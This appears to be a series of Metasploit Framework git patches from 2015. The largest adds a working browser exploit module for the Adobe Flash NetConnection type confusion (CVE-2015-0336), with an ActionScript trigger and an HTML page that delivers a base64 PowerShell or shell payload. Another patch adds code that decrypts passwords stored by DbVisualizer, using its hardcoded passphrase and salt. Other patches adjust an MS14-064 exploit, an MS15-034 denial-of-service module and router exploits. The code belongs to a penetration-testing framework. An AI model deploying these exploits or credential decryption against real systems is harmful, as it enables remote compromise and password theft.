+  <compileTargets>
+    <compile path="src\Main.as" />
+  </compileTargets>
+  <!-- Assets to embed into the output SWF -->
+  <library>
+    <!-- example: <asset path="..." id="..." update="..." glyphs="..." mode="..." place="..." sharepoint="..." /> -->
+  </library>
+  <!-- Paths to exclude from the Project Explorer tree -->
+  <hiddenPaths>
+    <hidden path="obj" />
+  </hiddenPaths>
+  <!-- Executed before build -->
+  <preBuildCommand />
+  <!-- Executed after build -->
+  <postBuildCommand alwaysRun="False" />
+  <!-- Other project options -->
+  <options>
+    <option showHiddenPaths="False" />
+    <option testMovie="Unknown" />
+    <option testMovieCommand="" />
+  </options>
+  <!-- Plugin storage -->
+  <storage />
+</project>
\ No newline at end of file
diff --git a/external/source/exploits/CVE-2015-0336/TriggerLinux/src/Main.as b/external/source/exploits/CVE-2015-0336/TriggerLinux/src/Main.as
new file mode 100755
index 0000000000..8dbada53c8
--- /dev/null
+++ b/external/source/exploits/CVE-2015-0336/TriggerLinux/src/Main.as
@@ -0,0 +1,18 @@
+// Build with FlashDevelop, its command line is:
+// fdbuild.exe "Trigger.as2proj" -ipc 22ef73b0-fe1e-4cd0-8363-4650575d43b6 -version "1.14" -compiler "C:\Program Files\FlashDevelop\Tools\mtasc" -notrace -library "C:\Program Files\FlashDevelop\Library"
+class Main 
+{
+	public static function main(swfRoot:MovieClip):Void 
+	{
+		var _loc2_ = _global.ASnative(2100, 0x956c2000);
+		var _loc3_ = new Object();
+		_loc2_.__proto__ = _loc3_; 
+		_global.ASnative(2100, 200)(_loc3_); //Netconnection constructor
+		_global.ASnative(2100, 8).apply(_loc2_, [1]); //NetConnection.farID
+	}
+	
+	public function Main() 
+	{
+	}
+	
+}
\ No newline at end of file
diff --git a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
new file mode 100644
index 0000000000..04360a9b08
--- /dev/null
+++ b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
@@ -0,0 +1,167 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'                => 'Adobe Flash Player NetConnection Type Confusion',
+      'Description'         => %q{
+        This module exploits a type confusion vulnerability in the NetConnection class on
+        Adobe Flash Player. When using a correct memory layout this vulnerability allows
+        to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like
+        vectors, and finally accomplish remote code execution. This module has been tested
+        successfully on:
+        * Windows 7 SP1 (32-bit) with IE 8, IE11 and Adobe Flash 16.0.0.305
+        * Linux Mint "Rebecca" (32 bits) with Firefox 33.0 and Adobe Flash 11.2.202.404
+      },
+      'License'             => MSF_LICENSE,
+      'Author'              =>
+        [
+          'Natalie Silvanovich', # Vulnerability discovery and Google Project Zero Exploit
+          'Unknown', # Exploit in the wild
+          'juan vazquez' # msf module
+        ],
+      'References'          =>
+        [
+          ['CVE', '2015-0336'],
+          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-05.html'],
+          ['URL', 'http://googleprojectzero.blogspot.com/2015/04/a-tale-of-two-exploits.html'],
+          ['URL', 'http://malware.dontneedcoffee.com/2015/03/cve-2015-0336-flash-up-to-1600305-and.html'],
+          ['URL', 'https://www.fireeye.com/blog/threat-research/2015/03/cve-2015-0336_nuclea.html'],
+          ['URL', 'https://blog.malwarebytes.org/exploits-2/2015/03/nuclear-ek-leverages-recently-patched-flash-vulnerability/']
+        ],
+      'Payload'             =>
+        {
+          'DisableNops' => true
+        },
+      'Platform'            => ['win', 'unix'],
+      'Arch'                => [ARCH_X86, ARCH_CMD],
+      'BrowserRequirements' =>
+        {
+          :source  => /script|headers/i,
+          :arch    => ARCH_X86,
+          :os_name => lambda do |os|
+            os =~ OperatingSystems::Match::LINUX ||
+              os =~ OperatingSystems::Match::WINDOWS_7
+          end,
+          :ua_name => lambda do |ua|
+            case target.name
+            when 'Windows'
+              return true if ua == Msf::HttpClients::IE
+            when 'Linux'
+              return true if ua == Msf::HttpClients::FF
+            end
+
+            false
+          end,
+          :flash   => lambda do |ver|
+            case target.name
+            when 'Windows'
+              return true if ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.305')
+            when 'Linux'
+              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.442')
+            end
+
+            false
+          end
+        },
+      'Targets'             =>
+        [
+          [ 'Windows',
+            {
+              'Platform' => 'win',
+              'Arch'     => ARCH_X86
+            }
+          ],
+          [ 'Linux',
+            {
+              'Platform' => 'unix',
+              'Arch'     => ARCH_CMD
+            }
+          ]
+        ],
+      'Privileged'          => false,
+      'DisclosureDate'      => 'Mar 12 2015',
+      'DefaultTarget'       => 0))
+  end
+
+  def exploit
+    @swf = create_swf
+    @trigger = create_trigger
+
+    super
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Request: #{request.uri}")
+
+    if request.uri =~ /\.swf$/
+      print_status('Sending SWF...')
+      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
+      return
+    end
+
+    print_status('Sending HTML...')
+    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+  end
+
+  def exploit_template(cli, target_info)
+    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+
+    if target.name =~ /Windows/
+      target_payload = get_payload(cli, target_info)
+      psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
+      b64_payload = Rex::Text.encode_base64(psh_payload)
+      platform_id = 'win'
+    elsif target.name =~ /Linux/
+      target_payload = get_payload(cli, target_info.merge(arch: ARCH_CMD))
+      b64_payload = Rex::Text.encode_base64(target_payload)
+      platform_id = 'linux'
+    end
+
+    trigger_hex_stream = @trigger.unpack('H*')[0]
+
+    html_template = %Q|<html>
+    <body>
+    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
+    <param name="movie" value="<%=swf_random%>" />
+    <param name="allowScriptAccess" value="always" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&tr=<%=trigger_hex_stream%>" />
+    <param name="Play" value="true" />
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&tr=<%=trigger_hex_stream%>" Play="true"/>
+    </object>
+    </body>
+    </html>
+    |
+
+    return html_template, binding()
+  end
+
+  def create_swf
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'msf.swf')
+    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
+
+    swf
+  end
+
+  def create_trigger
+    if target.name =~ /Linux/
+      path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'trigger_linux.swf')
+    else
+      path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'trigger.swf')
+    end
+
+    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
+
+    swf
+  end
+end
diff --git a/modules/exploits/windows/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/windows/browser/adobe_flash_net_connection_confusion.rb
index 9d5fb19f54..3bcb6a7130 100644
--- a/modules/exploits/windows/browser/adobe_flash_net_connection_confusion.rb
+++ b/modules/exploits/windows/browser/adobe_flash_net_connection_confusion.rb
@@ -10,6 +10,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::BrowserExploitServer
+  include Msf::Module::Deprecated
+
+  deprecated(Date.new(2015, 7, 27), 'exploit/multi/browser/adobe_flash_net_connection_confusion')
 
   def initialize(info={})
     super(update_info(info,

From 53774fed567badef5b2e0d932c07e425ea286ecd Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 27 May 2015 18:01:40 -0500
Subject: [PATCH 0209/1013] Be more strict with Win 7 for MS14-064

The Powershell prompt can cause BAP to hang so we need to be more
strict about that.
---
 .../windows/browser/ms14_064_ole_code_execution.rb       | 9 +++++++--
 1 file changed, 7 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
index f865093f34..aa0dd4bdd8 100644
--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -56,9 +56,9 @@ class Metasploit4 < Msf::Exploit::Remote
             }
           ],
           [
-            'Other Windows x86',
+            'Windows 7 SP1',
               {
-                'os_name' => OperatingSystems::Match::WINDOWS,
+                'os_name' => OperatingSystems::Match::WINDOWS_7
               }
           ]
         ],
@@ -358,6 +358,11 @@ end function
   end
 
   def on_request_exploit(cli, request, target_info)
+    if get_target.name.match(OperatingSystems::Match::WINDOWS_7) && !datastore['AllowPowershellPrompt']
+      send_not_found(cli)
+      return
+    end
+
     case request.uri
     when /\.gif/
       if get_target.name =~ OperatingSystems::Match::WINDOWS_XP

From d43706b65e986e124fb938f3dc5c7aa5daaf8098 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 27 May 2015 18:04:35 -0500
Subject: [PATCH 0210/1013] It doesn't look like Vista shows the powershell
 prompt

---
 .../windows/browser/ms14_064_ole_code_execution.rb        | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
index aa0dd4bdd8..3558ab2bda 100644
--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -56,7 +56,13 @@ class Metasploit4 < Msf::Exploit::Remote
             }
           ],
           [
-            'Windows 7 SP1',
+            'Windows Vista',
+              {
+                'os_name' => OperatingSystems::Match::WINDOWS_VISTA
+              }
+          ],
+          [
+            'Windows 7',
               {
                 'os_name' => OperatingSystems::Match::WINDOWS_7
               }

From 4f0e908c8b3f2ff3a0e54b683e7e1793f69d216c Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 27 May 2015 18:08:58 -0500
Subject: [PATCH 0211/1013] Never mind, Vista doesn't have powershell.

---
 .../exploits/windows/browser/ms14_064_ole_code_execution.rb | 6 ------
 1 file changed, 6 deletions(-)

diff --git a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
index 3558ab2bda..248f1b8f53 100644
--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -55,12 +55,6 @@ class Metasploit4 < Msf::Exploit::Remote
               'os_name' => OperatingSystems::Match::WINDOWS_XP
             }
           ],
-          [
-            'Windows Vista',
-              {
-                'os_name' => OperatingSystems::Match::WINDOWS_VISTA
-              }
-          ],
           [
             'Windows 7',
               {

From bcdae5fa1a067c8646022a809cdfde5990c21662 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 27 May 2015 18:12:38 -0500
Subject: [PATCH 0212/1013] Forgot to add the datastore option

---
 modules/exploits/windows/browser/ms14_064_ole_code_execution.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
index 248f1b8f53..3d2685d75a 100644
--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -84,6 +84,7 @@ class Metasploit4 < Msf::Exploit::Remote
       register_options(
         [
            OptBool.new('TRYUAC', [true, 'Ask victim to start as Administrator', false]),
+           OptBool.new('AllowPowershellPrompt', [true, 'Allow exploit to try Powershell', false])
         ], self.class )
 
   end

From 583fccdbc8243ebf82db6abf1874d63ad66931b4 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 27 May 2015 18:28:08 -0500
Subject: [PATCH 0213/1013] Resolve #5404, Check payload compatibility when
 using set payload

Resolve #5404. This patch will check payload compatibility when
you are using set payload in msfconsole.
---
 lib/msf/ui/console/driver.rb | 11 +++++++++++
 1 file changed, 11 insertions(+)

diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb
index 922d3c384c..de7dd7f2e7 100644
--- a/lib/msf/ui/console/driver.rb
+++ b/lib/msf/ui/console/driver.rb
@@ -571,6 +571,8 @@ class Driver < Msf::Ui::Driver
 
         if (framework and framework.payloads.valid?(val) == false)
           return false
+        elsif active_module.type == 'exploit' && !is_payload_compatible?(active_module, val)
+          return false
         elsif (active_module)
           active_module.datastore.clear_non_user_defined
         elsif (framework)
@@ -589,6 +591,15 @@ class Driver < Msf::Ui::Driver
     end
   end
 
+
+  def is_payload_compatible?(m, payload_name)
+    m.compatible_payloads.each do |k|
+      return true if k[0] == payload_name
+    end
+
+    false
+  end
+
   #
   # Called when a variable is unset.  If this routine returns false it is an
   # indication that the variable should not be allowed to be unset.

From 1ab49397a24f25e4df5ce5f0fdf386c70269df7c Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Thu, 28 May 2015 10:21:00 +0500
Subject: [PATCH 0214/1013] Decrypt encrypted passwords

---
 modules/post/multi/gather/dbvis_enum.rb | 135 +++++++++++++++---------
 1 file changed, 85 insertions(+), 50 deletions(-)

diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb
index b44eee8ffb..3f8d7d3198 100644
--- a/modules/post/multi/gather/dbvis_enum.rb
+++ b/modules/post/multi/gather/dbvis_enum.rb
@@ -5,6 +5,8 @@
 
 require 'msf/core'
 require 'msf/core/auxiliary/report'
+require 'openssl'
+require 'digest/md5'
 
 class Metasploit3 < Msf::Post
 
@@ -17,7 +19,7 @@ class Metasploit3 < Msf::Post
         'Name'          => 'Multi Gather DbVisualizer Connections Settings',
         'Description'   => %q{
           DbVisualizer stores the user database configuration in dbvis.xml.
-          This module retrieves the connections settings from this file.
+          This module retrieves the connections settings from this file and decrypts the encrypted passwords.
         },
         'License'       => MSF_LICENSE,
         'Author'        => [ 'David Bloom' ], # Twitter: @philophobia78
@@ -28,14 +30,13 @@ class Metasploit3 < Msf::Post
 
   def run
 
-
     oldversion = false
 
     case session.platform
     when /linux/
-      user = session.shell_command("whoami").chomp
+      user = session.shell_command('whoami').chomp
       print_status("Current user is #{user}")
-      if (user =~ /root/)
+      if user =~ /root/
         user_base = "/root/"
       else
          user_base = "/home/#{user}/"
@@ -50,11 +51,10 @@ class Metasploit3 < Msf::Post
       dbvis_file = user_profile + "\\.dbvis\\config70\\dbvis.xml"
     end
 
-
     unless file?(dbvis_file)
       # File not found, we next try with the old config path
       print_status("File not found: #{dbvis_file}")
-      print_status("This could be an older version of dbvis, trying old path")
+      print_status('This could be an older version of dbvis, trying old path')
       case session.platform
       when /linux/
         dbvis_file = "#{user_base}.dbvis/config/dbvis.xml"
@@ -68,7 +68,6 @@ class Metasploit3 < Msf::Post
       oldversion = true
     end
 
-
     print_status("Reading: #{dbvis_file}")
     print_line()
     raw_xml = ""
@@ -89,20 +88,14 @@ class Metasploit3 < Msf::Post
     end
 
     if db_table.rows.empty?
-      print_status("No database settings found")
+      print_status('No database settings found')
     else
-      print_line("\n")
+      print_line
       print_line(db_table.to_s)
-      print_good("Try to query listed databases with dbviscmd.sh (or .bat) -connection <alias> -sql <statements> and have fun !")
+      print_good('Try to query listed databases with dbviscmd.sh (or .bat) -connection <alias> -sql <statements> and have fun!')
       print_line()
-      # store found databases
-      p = store_loot(
-        "dbvis.databases",
-        "text/csv",
-        session,
-        db_table.to_csv,
-        "dbvis_databases.txt",
-        "dbvis databases")
+      # Store found databases in loot
+      p = store_loot('dbvis.databases', 'text/csv', session, db_table.to_csv, 'dbvis_databases.txt', 'dbvis databases')
       print_good("Databases settings stored in: #{p.to_s}")
     end
 
@@ -111,12 +104,11 @@ class Metasploit3 < Msf::Post
     print_good "dbvis.xml saved to #{p.to_s}"
   end
 
-
   # New config file parse function
   def parse_new_config_file(raw_xml)
 
     db_table = Rex::Ui::Text::Table.new(
-    'Header'    => "Dbvis Databases",
+    'Header'    => "DbVisualizer Databases",
     'Indent'    => 2,
     'Columns'   =>
     [
@@ -127,17 +119,18 @@ class Metasploit3 < Msf::Post
       "Database",
       "Namespace",
       "Userid",
+      "Password"
     ])
 
     dbs = []
     db = {}
     dbfound = false
-    versionFound = false
+    version_found = false
     # fetch config file
     raw_xml.each_line do |line|
 
-      if versionFound == false
-         vesrionFound = find_version(line)
+      if version_found == false
+        version_found = find_version(line)
       end
 
       if line =~ /<Database id=/
@@ -157,37 +150,43 @@ class Metasploit3 < Msf::Post
 
       if dbfound == true
         # get the alias
-        if (line =~ /<Alias>([\S+\s+]+)<\/Alias>/i)
+        if line =~ /<Alias>([\S+\s+]+)<\/Alias>/i
           db[:Alias] = $1
         end
 
         # get the type
-        if (line =~ /<Type>([\S+\s+]+)<\/Type>/i)
+        if line =~ /<Type>([\S+\s+]+)<\/Type>/i
           db[:Type] = $1
         end
 
         # get the user
-        if (line =~ /<Userid>([\S+\s+]+)<\/Userid>/i)
+        if line =~ /<Userid>([\S+\s+]+)<\/Userid>/i
           db[:Userid] = $1
         end
 
+        # get user password
+        if line =~ /<Password>([\S+\s+]+)<\/Password>/i
+          enc_password = $1
+          db[:Password] = decrypt_password(enc_password)
+        end
+
         # get the server
-        if (line =~ /<UrlVariable UrlVariableName="Server">([\S+\s+]+)<\/UrlVariable>/i)
+        if line =~ /<UrlVariable UrlVariableName="Server">([\S+\s+]+)<\/UrlVariable>/i
           db[:Server] = $1
         end
 
         # get the port
-        if (line =~ /<UrlVariable UrlVariableName="Port">([\S+]+)<\/UrlVariable>/i)
+        if line =~ /<UrlVariable UrlVariableName="Port">([\S+\s+]+)<\/UrlVariable>/i
           db[:Port] = $1
         end
 
         # get the database
-        if (line =~ /<UrlVariable UrlVariableName="Database">([\S+\s+]+)<\/UrlVariable>/i)
+        if line =~ /<UrlVariable UrlVariableName="Database">([\S+\s+]+)<\/UrlVariable>/i
           db[:Database] = $1
         end
 
         # get the Namespace
-        if (line =~ /<UrlVariable UrlVariableName="Namespace">([\S+\s+]+)<\/UrlVariable>/i)
+        if line =~ /<UrlVariable UrlVariableName="Namespace">([\S+\s+]+)<\/UrlVariable>/i
           db[:Namespace] = $1
         end
       end
@@ -196,40 +195,40 @@ class Metasploit3 < Msf::Post
     # Fill the tab and report eligible servers
     dbs.each do |db|
       if ::Rex::Socket.is_ipv4?(db[:Server].to_s)
-        print_good("Reporting #{db[:Server]} ")
+        print_good("Reporting #{db[:Server]}")
         report_host(:host =>  db[:Server]);
       end
 
-      db_table << [ db[:Alias] , db[:Type] , db[:Server], db[:Port], db[:Database], db[:Namespace], db[:Userid]]
+      db_table << [ db[:Alias], db[:Type], db[:Server], db[:Port], db[:Database], db[:Namespace], db[:Userid], db[:Password]]
     end
     return db_table
   end
 
-
   # New config file parse function
   def parse_old_config_file(raw_xml)
 
     db_table = Rex::Ui::Text::Table.new(
-    'Header'    => "Dbvis Databases",
+    'Header'    => 'DbVisualizer Databases',
     'Indent'    => 2,
     'Columns'   =>
     [
-      "Alias",
-      "Type",
-      "Url",
-      "Userid",
+      'Alias',
+      'Type',
+      'URL',
+      'UserID',
+      'Password'
     ])
 
     dbs = []
     db = {}
     dbfound = false
-    versionFound = false
+    version_found = false
 
     # fetch config file
     raw_xml.each_line do |line|
 
-      if versionFound == false
-         vesrionFound = find_version(line)
+      if version_found == false
+         vesrion_found = find_version(line)
       end
 
       if line =~ /<Database id=/
@@ -243,24 +242,31 @@ class Metasploit3 < Msf::Post
 
       if dbfound == true
         # get the alias
-        if (line =~ /<Alias>([\S+\s+]+)<\/Alias>/i)
+        if line =~ /<Alias>([\S+\s+]+)<\/Alias>/i
           db[:Alias] = $1
         end
 
         # get the type
-        if (line =~ /<Type>([\S+\s+]+)<\/Type>/i)
+        if line =~ /<Type>([\S+\s+]+)<\/Type>/i
           db[:Type] = $1
         end
 
         # get the user
-        if (line =~ /<Userid>([\S+\s+]+)<\/Userid>/i)
+        if line =~ /<Userid>([\S+\s+]+)<\/Userid>/i
           db[:Userid] = $1
         end
 
-        # get the user
-        if (line =~ /<Url>([\S+\s+]+)<\/Url>/i)
+        #get the user password
+        if line =~ /<Password>([\S+\s+]+)<\/Password>/i
+          enc_password = $1
+          db[:Password] = decrypt_password(enc_password)
+        end
+
+        # get the server URL
+        if line =~ /<Url>(\S+)<\/Url>/i
           db[:Url] = $1
         end
+
       end
     end
 
@@ -277,14 +283,43 @@ class Metasploit3 < Msf::Post
     return db_table
   end
 
-
   def find_version(tag)
     found = false
-    if (tag =~ /<Version>([\S+\s+]+)<\/Version>/i)
-      print_good("DbVisualizer version :  #{$1}")
+    if tag =~ /<Version>([\S+\s+]+)<\/Version>/i
       found = true
+      print_good("DbVisualizer version: #{$1}")
     end
-    return found
+    found
+  end
+
+  def decrypt_password(enc_password)
+    enc_password = Rex::Text.decode_base64(enc_password)
+    dk, iv = get_derived_key
+    des = OpenSSL::Cipher.new('DES-CBC')
+    des.key = dk
+    des.iv = iv
+
+    des.update(enc_password)
+  end
+
+  def get_derived_key
+    key = passphrase + salt
+    iteration_count.times do
+      key = Digest::MD5.digest(key)
+    end
+    return key[0,8], key[8,8]
+  end
+
+  def salt
+    [-114,18,57,-100,7,114,111,90].pack('C*')
+  end
+
+  def passphrase
+    'qinda'
+  end
+
+  def iteration_count
+    10
   end
 
 end

From 2756c7375e436b7da1007cd2d77b74daade80863 Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Thu, 28 May 2015 10:58:36 +0500
Subject: [PATCH 0215/1013] Add datastore options

---
 modules/post/multi/gather/dbvis_enum.rb | 9 +++++++--
 1 file changed, 7 insertions(+), 2 deletions(-)

diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb
index 3f8d7d3198..74bea5de13 100644
--- a/modules/post/multi/gather/dbvis_enum.rb
+++ b/modules/post/multi/gather/dbvis_enum.rb
@@ -26,6 +26,11 @@ class Metasploit3 < Msf::Post
         'Platform'      => %w{ linux win },
         'SessionTypes'  => [ 'meterpreter', 'shell']
       ))
+    register_options(
+      [
+        OptString.new('PASSPHRASE', [false, 'The hardcoded passphrase used for encryption']),
+        OptInt.new('ITERATION_COUNT', [false, 'The iteration count used in key derivation', 10])
+      ], super.class)
   end
 
   def run
@@ -315,11 +320,11 @@ class Metasploit3 < Msf::Post
   end
 
   def passphrase
-    'qinda'
+    datastore['PASSPHRASE'] || 'qinda'
   end
 
   def iteration_count
-    10
+    datastore['ITERATION_COUNT'] || 10
   end
 
 end

From 447c4ee7df613eef5f56eb4e95757d0366e1d9bc Mon Sep 17 00:00:00 2001
From: erwanlr <erwan.lr@gmail.com>
Date: Thu, 28 May 2015 09:30:04 +0100
Subject: [PATCH 0216/1013] =?UTF-8?q?Allows=20the=20target=C3=A8uri=20to?=
 =?UTF-8?q?=20be=20shared=20between=20the=20#check=20and=20#dos?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
index 7aa1d270e6..354995434d 100644
--- a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
+++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
@@ -64,6 +64,11 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
+  # Needed to allow the vulnerable uri to be shared between the #check and #dos
+  def target_uri
+    @target_uri ||= super
+  end
+
   def get_file_size(ip)
     @file_size ||= lambda {
       file_size = -1

From 6d01d7f986cd0719558d44a0d4406b1c3b45c858 Mon Sep 17 00:00:00 2001
From: erwanlr <erwan.lr@gmail.com>
Date: Thu, 28 May 2015 09:32:05 +0100
Subject: [PATCH 0217/1013] Uses peer instead of ip:port across all the module

---
 modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
index 354995434d..55265f2602 100644
--- a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
+++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
@@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
     if check_host(ip) == Exploit::CheckCode::Vulnerable
       dos_host(ip)
     else
-      print_status("#{ip}:#{rport} - Probably not vulnerable, will not dos it.")
+      print_status("#{peer} - Probably not vulnerable, will not dos it.")
     end
   end
 
@@ -76,17 +76,17 @@ class Metasploit3 < Msf::Auxiliary
       res = send_request_raw('uri' => uri)
 
       unless res
-        vprint_error("#{ip}:#{rport} - Connection timed out")
+        vprint_error("#{peer} - Connection timed out")
         return file_size
       end
 
       if res.code == 404
-        vprint_error("#{ip}:#{rport} - You got a 404. URI must be a valid resource.")
+        vprint_error("#{peer} - You got a 404. URI must be a valid resource.")
         return file_size
       end
 
       file_size = res.body.length
-      vprint_status("#{ip}:#{rport} - File length: #{file_size} bytes")
+      vprint_status("#{peer} - File length: #{file_size} bytes")
 
       return file_size
     }.call
@@ -112,7 +112,7 @@ class Metasploit3 < Msf::Auxiliary
     rescue ::Errno::EPIPE, ::Timeout::Error
       # Same exceptions the HttpClient mixin catches
     end
-    print_status("#{ip}:#{rport} - DOS request sent")
+    print_status("#{peer} - DOS request sent")
   end
 
   def potential_static_files_uris

From a74c3372c0dda4b66819e7a4da3fe4a76924594e Mon Sep 17 00:00:00 2001
From: erwanlr <erwan.lr@gmail.com>
Date: Thu, 28 May 2015 15:46:51 +0100
Subject: [PATCH 0218/1013] Uses vprint instead of print in #check_host

---
 modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
index 55265f2602..5cd2e640cd 100644
--- a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
+++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
@@ -160,7 +160,7 @@ class Metasploit3 < Msf::Auxiliary
       vmessage = "#{peer} - Checking #{uri} [#{res.code}]"
 
       if res && res.body.include?('Requested Range Not Satisfiable')
-        print_status("#{peer} - #{uri} is vulnerable")
+        vprint_status("#{vmessage} - Vulnerable")
 
         target_uri.path = uri # Needed for the DoS attack
 

From 666b0bc34a4cbe6b06e851174f0e0bcbf7f67edc Mon Sep 17 00:00:00 2001
From: Michael Messner <devnull@s3cur1ty.de>
Date: Thu, 28 May 2015 18:50:48 +0200
Subject: [PATCH 0219/1013] MIPSBE vs MIPS

---
 modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
index 28aa2c61a3..b6bdb4e24d 100644
--- a/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
@@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'MIPS Big Endian',  # unknown if there are BE devices out there ... but in case we have a target
             {
               'Platform' => 'linux',
-              'Arch'     => ARCH_MIPS
+              'Arch'     => ARCH_MIPSBE
             }
           ],
         ],

From 818dbf58f0839052baa25a8720ea66043e728461 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Thu, 28 May 2015 14:37:39 -0500
Subject: [PATCH 0220/1013] Adding an OSVDB number to the Netgear module

---
 modules/auxiliary/admin/http/netgear_soap_password_extractor.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb
index f97ae71ee2..9158af9b7e 100644
--- a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb
+++ b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb
@@ -31,6 +31,7 @@ class Metasploit3 < Msf::Auxiliary
       'References'  =>
         [
           [ 'BID', '72640' ],
+          [ 'OSVDB', '118316' ],
           [ 'URL', 'https://github.com/darkarnium/secpub/tree/master/NetGear/SOAPWNDR' ]
         ],
       'Author'      =>

From f9f35db7f33ee235e0dd51949a2ec736db633c60 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 28 May 2015 14:52:03 -0500
Subject: [PATCH 0221/1013] Update description

---
 modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb | 4 ----
 1 file changed, 4 deletions(-)

